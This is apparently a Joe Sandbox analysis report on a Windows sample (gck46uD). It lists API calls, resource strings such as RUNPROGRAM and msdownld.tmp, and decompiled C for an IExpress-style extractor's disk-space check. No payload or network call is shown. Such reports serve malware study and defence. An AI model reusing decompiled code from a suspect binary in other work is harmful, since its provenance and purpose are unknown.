                                                                                                                                                                                                                                                0x000256c1
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x00025705
                                                                                                                                                                                                                                                0x0002570a
                                                                                                                                                                                                                                                0x00025711
                                                                                                                                                                                                                                                0x00025717
                                                                                                                                                                                                                                                0x00025724
                                                                                                                                                                                                                                                0x00025726
                                                                                                                                                                                                                                                0x00025729
                                                                                                                                                                                                                                                0x00025730
                                                                                                                                                                                                                                                0x00025737
                                                                                                                                                                                                                                                0x0002573d
                                                                                                                                                                                                                                                0x00025740
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002572b
                                                                                                                                                                                                                                                0x0002572b
                                                                                                                                                                                                                                                0x0002572e
                                                                                                                                                                                                                                                0x00025742
                                                                                                                                                                                                                                                0x00025742
                                                                                                                                                                                                                                                0x00025745
                                                                                                                                                                                                                                                0x0002576b
                                                                                                                                                                                                                                                0x0002576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025747
                                                                                                                                                                                                                                                0x00025747
                                                                                                                                                                                                                                                0x0002574d
                                                                                                                                                                                                                                                0x0002574f
                                                                                                                                                                                                                                                0x00025771
                                                                                                                                                                                                                                                0x00025771
                                                                                                                                                                                                                                                0x00025773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025751
                                                                                                                                                                                                                                                0x00025751
                                                                                                                                                                                                                                                0x00025753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025755
                                                                                                                                                                                                                                                0x0002575b
                                                                                                                                                                                                                                                0x00025760
                                                                                                                                                                                                                                                0x00025762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025764
                                                                                                                                                                                                                                                0x00025764
                                                                                                                                                                                                                                                0x00025769
                                                                                                                                                                                                                                                0x0002577e
                                                                                                                                                                                                                                                0x0002577e
                                                                                                                                                                                                                                                0x00025781
                                                                                                                                                                                                                                                0x00025788
                                                                                                                                                                                                                                                0x0002578d
                                                                                                                                                                                                                                                0x0002578f
                                                                                                                                                                                                                                                0x000257b2
                                                                                                                                                                                                                                                0x000257b8
                                                                                                                                                                                                                                                0x000257bd
                                                                                                                                                                                                                                                0x000257bf
                                                                                                                                                                                                                                                0x000257cd
                                                                                                                                                                                                                                                0x000257cd
                                                                                                                                                                                                                                                0x000257dd
                                                                                                                                                                                                                                                0x000257e3
                                                                                                                                                                                                                                                0x000257ef
                                                                                                                                                                                                                                                0x000257f5
                                                                                                                                                                                                                                                0x000257f8
                                                                                                                                                                                                                                                0x0002580a
                                                                                                                                                                                                                                                0x0002580a
                                                                                                                                                                                                                                                0x000257fa
                                                                                                                                                                                                                                                0x00025802
                                                                                                                                                                                                                                                0x00025802
                                                                                                                                                                                                                                                0x0002580d
                                                                                                                                                                                                                                                0x0002580f
                                                                                                                                                                                                                                                0x00025830
                                                                                                                                                                                                                                                0x00025836
                                                                                                                                                                                                                                                0x0002583d
                                                                                                                                                                                                                                                0x0002584b
                                                                                                                                                                                                                                                0x00025851
                                                                                                                                                                                                                                                0x00025855
                                                                                                                                                                                                                                                0x0002585a
                                                                                                                                                                                                                                                0x0002585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x00025811
                                                                                                                                                                                                                                                0x00025817
                                                                                                                                                                                                                                                0x00025819
                                                                                                                                                                                                                                                0x0002581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002581f
                                                                                                                                                                                                                                                0x00025791
                                                                                                                                                                                                                                                0x00025797
                                                                                                                                                                                                                                                0x0002579c
                                                                                                                                                                                                                                                0x0002579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000257a0
                                                                                                                                                                                                                                                0x000257a9
                                                                                                                                                                                                                                                0x000257ae
                                                                                                                                                                                                                                                0x000257b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000257b0
                                                                                                                                                                                                                                                0x0002579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025769
                                                                                                                                                                                                                                                0x00025762
                                                                                                                                                                                                                                                0x00025753
                                                                                                                                                                                                                                                0x0002574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025864
                                                                                                                                                                                                                                                0x00025864
                                                                                                                                                                                                                                                0x00025864
                                                                                                                                                                                                                                                0x00025717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000256c3
                                                                                                                                                                                                                                                0x000256c5
                                                                                                                                                                                                                                                0x000256c9
                                                                                                                                                                                                                                                0x000256ce
                                                                                                                                                                                                                                                0x000256d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000256d6
                                                                                                                                                                                                                                                0x000256d6
                                                                                                                                                                                                                                                0x000256d8
                                                                                                                                                                                                                                                0x000256dd
                                                                                                                                                                                                                                                0x000256df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000256e1
                                                                                                                                                                                                                                                0x000256e2
                                                                                                                                                                                                                                                0x000256e4
                                                                                                                                                                                                                                                0x000256e6
                                                                                                                                                                                                                                                0x000256eb
                                                                                                                                                                                                                                                0x000256ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002586c
                                                                                                                                                                                                                                                0x00025878
                                                                                                                                                                                                                                                0x0002587e
                                                                                                                                                                                                                                                0x00025882
                                                                                                                                                                                                                                                0x00025883
                                                                                                                                                                                                                                                0x00025889
                                                                                                                                                                                                                                                0x0002588e
                                                                                                                                                                                                                                                0x0002588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025896
                                                                                                                                                                                                                                                0x000256ed
                                                                                                                                                                                                                                                0x000256df
                                                                                                                                                                                                                                                0x000256d0
                                                                                                                                                                                                                                                0x000256c1
                                                                                                                                                                                                                                                0x000256a8
                                                                                                                                                                                                                                                0x0002565b
                                                                                                                                                                                                                                                0x0002565b
                                                                                                                                                                                                                                                0x0002565d
                                                                                                                                                                                                                                                0x00025669
                                                                                                                                                                                                                                                0x00025669
                                                                                                                                                                                                                                                0x0002565f
                                                                                                                                                                                                                                                0x0002565f
                                                                                                                                                                                                                                                0x00025665
                                                                                                                                                                                                                                                0x00025667
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025667
                                                                                                                                                                                                                                                0x0002566c
                                                                                                                                                                                                                                                0x00025673
                                                                                                                                                                                                                                                0x00025678
                                                                                                                                                                                                                                                0x0002567a
                                                                                                                                                                                                                                                0x0002589b
                                                                                                                                                                                                                                                0x0002589b
                                                                                                                                                                                                                                                0x00025680
                                                                                                                                                                                                                                                0x00025685
                                                                                                                                                                                                                                                0x0002568c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002568c
                                                                                                                                                                                                                                                0x0002567a
                                                                                                                                                                                                                                                0x0002560e
                                                                                                                                                                                                                                                0x00025613
                                                                                                                                                                                                                                                0x0002561a
                                                                                                                                                                                                                                                0x00025620
                                                                                                                                                                                                                                                0x00025626
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025626
                                                                                                                                                                                                                                                0x000255db
                                                                                                                                                                                                                                                0x000255e0
                                                                                                                                                                                                                                                0x000255e7
                                                                                                                                                                                                                                                0x000255f1
                                                                                                                                                                                                                                                0x000255f6
                                                                                                                                                                                                                                                0x000255f6
                                                                                                                                                                                                                                                0x000255f6
                                                                                                                                                                                                                                                0x000258b7
                                                                                                                                                                                                                                                0x000258c7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000255CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00025638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0002564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00025620
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000256B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0002571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00025737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000257CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000257EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00025802
                                                                                                                                                                                                                                                  • Part of subcall function 00022630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00022654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00025830
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00025878
                                                                                                                                                                                                                                                  • Part of subcall function 0002597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000259A8
                                                                                                                                                                                                                                                  • Part of subcall function 0002597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000259AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                                • Opcode ID: 249ab86c6c28da75ca63c44383e9212d914c7f9d306955ce8e752524b2f2de01
                                                                                                                                                                                                                                                • Instruction ID: 0fb99a8bf4f4f0f032c473d633a33e328eb647287c385484e538f257ddcffe43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 249ab86c6c28da75ca63c44383e9212d914c7f9d306955ce8e752524b2f2de01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68814070B04A345BEB70AB74BC85BFE72AD9F65301F1400A5F586E3191DFB48DC28A59
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 2597d-259b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 259bb-259d8 call 244b9 call 26285 324->325 326 259dd-25a1b GetDiskFreeSpaceA 324->326 343 25c05-25c14 call 26ce0 325->343 328 25ba1-25bde memset call 26285 GetLastError FormatMessageA 326->328 329 25a21-25a4a MulDiv 326->329 338 25be3-25bfc call 244b9 SetCurrentDirectoryA 328->338 329->328 332 25a50-25a6c GetVolumeInformationA 329->332 335 25ab5-25aca SetCurrentDirectoryA 332->335 336 25a6e-25ab0 memset call 26285 GetLastError FormatMessageA 332->336 340 25acc-25ad1 335->340 336->338 353 25c02 338->353 341 25ae2-25ae4 340->341 342 25ad3-25ad8 340->342 348 25ae6 341->348 349 25ae7-25af8 341->349 342->341 346 25ada-25ae0 342->346 346->340 346->341 348->349 352 25af9-25afb 349->352 355 25b05-25b08 352->355 356 25afd-25b03 352->356 354 25c04 353->354 354->343 357 25b20-25b27 355->357 358 25b0a-25b1b call 244b9 355->358 356->352 356->355 360 25b52-25b5b 357->360 361 25b29-25b33 357->361 358->353 364 25b62-25b6d 360->364 361->360 363 25b35-25b50 361->363 363->364 365 25b76-25b7d 364->365 366 25b6f-25b74 364->366 368 25b83 365->368 369 25b7f-25b81 365->369 367 25b85 366->367 370 25b96-25b9f 367->370 371 25b87-25b94 call 2268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0002597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x28004; // 0xf4950d3e
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x29124 = E00026285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000244B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x29a34 & 0x00000008;
							if(( *0x29a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x29a38; // 0x0
								_t110 =  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x29124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0002268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x29a38; // 0x0
							_t110 =  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x29a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000244B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x29124 = E00026285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000244B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x29124 = E00026285();
					_t66 = 0;
					L33:
					return E00026CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                                0x0002597d
                                                                                                                                                                                                                                                0x00025988
                                                                                                                                                                                                                                                0x0002598f
                                                                                                                                                                                                                                                0x0002599a
                                                                                                                                                                                                                                                0x000259a6
                                                                                                                                                                                                                                                0x000259a8
                                                                                                                                                                                                                                                0x000259af
                                                                                                                                                                                                                                                0x000259b9
                                                                                                                                                                                                                                                0x000259dd
                                                                                                                                                                                                                                                0x000259e4
                                                                                                                                                                                                                                                0x000259f1
                                                                                                                                                                                                                                                0x000259fe
                                                                                                                                                                                                                                                0x00025a0b
                                                                                                                                                                                                                                                0x00025a13
                                                                                                                                                                                                                                                0x00025a19
                                                                                                                                                                                                                                                0x00025a1b
                                                                                                                                                                                                                                                0x00025ba1
                                                                                                                                                                                                                                                0x00025baf
                                                                                                                                                                                                                                                0x00025bbd
                                                                                                                                                                                                                                                0x00025bd8
                                                                                                                                                                                                                                                0x00025bde
                                                                                                                                                                                                                                                0x00025be3
                                                                                                                                                                                                                                                0x00025bec
                                                                                                                                                                                                                                                0x00025bf0
                                                                                                                                                                                                                                                0x00025bfc
                                                                                                                                                                                                                                                0x00025c02
                                                                                                                                                                                                                                                0x00025c02
                                                                                                                                                                                                                                                0x00025c02
                                                                                                                                                                                                                                                0x00025c04
                                                                                                                                                                                                                                                0x00025c04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025c04
                                                                                                                                                                                                                                                0x00025a27
                                                                                                                                                                                                                                                0x00025a3a
                                                                                                                                                                                                                                                0x00025a46
                                                                                                                                                                                                                                                0x00025a48
                                                                                                                                                                                                                                                0x00025a4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025a64
                                                                                                                                                                                                                                                0x00025a6a
                                                                                                                                                                                                                                                0x00025a6c
                                                                                                                                                                                                                                                0x00025abc
                                                                                                                                                                                                                                                0x00025ac2
                                                                                                                                                                                                                                                0x00025ac9
                                                                                                                                                                                                                                                0x00025aca
                                                                                                                                                                                                                                                0x00025aca
                                                                                                                                                                                                                                                0x00025acc
                                                                                                                                                                                                                                                0x00025acc
                                                                                                                                                                                                                                                0x00025acf
                                                                                                                                                                                                                                                0x00025ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ad3
                                                                                                                                                                                                                                                0x00025ad6
                                                                                                                                                                                                                                                0x00025ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ada
                                                                                                                                                                                                                                                0x00025adc
                                                                                                                                                                                                                                                0x00025add
                                                                                                                                                                                                                                                0x00025add
                                                                                                                                                                                                                                                0x00025ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ae0
                                                                                                                                                                                                                                                0x00025ae2
                                                                                                                                                                                                                                                0x00025ae4
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae9
                                                                                                                                                                                                                                                0x00025aeb
                                                                                                                                                                                                                                                0x00025af0
                                                                                                                                                                                                                                                0x00025af6
                                                                                                                                                                                                                                                0x00025af8
                                                                                                                                                                                                                                                0x00025af9
                                                                                                                                                                                                                                                0x00025af9
                                                                                                                                                                                                                                                0x00025afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025afd
                                                                                                                                                                                                                                                0x00025aff
                                                                                                                                                                                                                                                0x00025b00
                                                                                                                                                                                                                                                0x00025b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b03
                                                                                                                                                                                                                                                0x00025b05
                                                                                                                                                                                                                                                0x00025b08
                                                                                                                                                                                                                                                0x00025b20
                                                                                                                                                                                                                                                0x00025b27
                                                                                                                                                                                                                                                0x00025b52
                                                                                                                                                                                                                                                0x00025b52
                                                                                                                                                                                                                                                0x00025b5b
                                                                                                                                                                                                                                                0x00025b62
                                                                                                                                                                                                                                                0x00025b6b
                                                                                                                                                                                                                                                0x00025b6d
                                                                                                                                                                                                                                                0x00025b76
                                                                                                                                                                                                                                                0x00025b7d
                                                                                                                                                                                                                                                0x00025b83
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b6f
                                                                                                                                                                                                                                                0x00025b72
                                                                                                                                                                                                                                                0x00025b72
                                                                                                                                                                                                                                                0x00025b85
                                                                                                                                                                                                                                                0x00025b98
                                                                                                                                                                                                                                                0x00025b9e
                                                                                                                                                                                                                                                0x00025b87
                                                                                                                                                                                                                                                0x00025b8f
                                                                                                                                                                                                                                                0x00025b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b85
                                                                                                                                                                                                                                                0x00025b29
                                                                                                                                                                                                                                                0x00025b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b35
                                                                                                                                                                                                                                                0x00025b48
                                                                                                                                                                                                                                                0x00025b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b4a
                                                                                                                                                                                                                                                0x00025b0f
                                                                                                                                                                                                                                                0x00025b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b16
                                                                                                                                                                                                                                                0x00025a7c
                                                                                                                                                                                                                                                0x00025a8a
                                                                                                                                                                                                                                                0x00025aa5
                                                                                                                                                                                                                                                0x00025aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000259bb
                                                                                                                                                                                                                                                0x000259c0
                                                                                                                                                                                                                                                0x000259c7
                                                                                                                                                                                                                                                0x000259d1
                                                                                                                                                                                                                                                0x000259d6
                                                                                                                                                                                                                                                0x00025c05
                                                                                                                                                                                                                                                0x00025c14
                                                                                                                                                                                                                                                0x00025c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000259A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 000259AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00025A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00025A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00025A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00025A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00025A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00025AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00025BFC
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: d78561aac4116e1ae68b99426f51e99db5b291ac7e18e6de077204d16dcaf14c
